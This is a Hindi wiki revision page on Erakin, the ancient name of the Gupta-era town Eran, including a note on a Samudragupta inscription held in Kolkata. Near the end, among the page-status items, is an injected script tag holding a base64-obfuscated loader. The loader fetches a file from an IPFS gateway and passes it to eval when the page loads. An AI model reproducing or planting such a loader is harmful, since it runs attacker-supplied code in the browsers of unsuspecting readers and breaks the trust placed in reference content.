Difference between revisions of "एरकिण"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('एरण गुप्तकाल में एक महत्त्वपूर्ण नगर था। एरण का...' के साथ नया पृष्ठ बनाया)
 
 
Line 1: Line 1:
 
[[एरण]] [[गुप्तकाल]] में एक महत्त्वपूर्ण नगर था। एरण का '''प्राचीन नाम एरकिण''' था। यहाँ से गुप्तकाल के अनेक [[अभिलेख]] प्राप्त हुये है। गुप्त सम्राट [[समुद्रगुप्त]] के एक [[शिलालेख]] में एरण को '[[एरकिण]]' कहा गया है। इस अभिलेख को [[कनिंघम]] ने खोजा था। यह वर्तमान में [[कोलकाता]] संग्रहालय में सुरक्षित है। यह भग्नावस्था में हैं। फिर भी जितना बचा है, उससे समुद्रगुप्त के बारे में काफ़ी जानकारी प्राप्त होती है।  
 
[[एरण]] [[गुप्तकाल]] में एक महत्त्वपूर्ण नगर था। एरण का '''प्राचीन नाम एरकिण''' था। यहाँ से गुप्तकाल के अनेक [[अभिलेख]] प्राप्त हुये है। गुप्त सम्राट [[समुद्रगुप्त]] के एक [[शिलालेख]] में एरण को '[[एरकिण]]' कहा गया है। इस अभिलेख को [[कनिंघम]] ने खोजा था। यह वर्तमान में [[कोलकाता]] संग्रहालय में सुरक्षित है। यह भग्नावस्था में हैं। फिर भी जितना बचा है, उससे समुद्रगुप्त के बारे में काफ़ी जानकारी प्राप्त होती है।  
  
 +
{{seealso|एरण}}
  
  

Latest revision as of 11:44, 18 May 2018

eran guptakal mean ek mahattvapoorn nagar tha. eran ka prachin nam erakin tha. yahaan se guptakal ke anek abhilekh prapt huye hai. gupt samrat samudragupt ke ek shilalekh mean eran ko 'erakin' kaha gaya hai. is abhilekh ko kaniangham ne khoja tha. yah vartaman mean kolakata sangrahalay mean surakshit hai. yah bhagnavastha mean haian. phir bhi jitana bacha hai, usase samudragupt ke bare mean kafi janakari prapt hoti hai.

  1. REDIRECTsaancha:inhean bhi dekhean





panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  • aitihasik sthanavali | prishth sankhya= 111| vijayendr kumar mathur | vaijnanik tatha takaniki shabdavali ayog | manav sansadhan vikas mantralay, bharat sarakar


sanbandhit lekh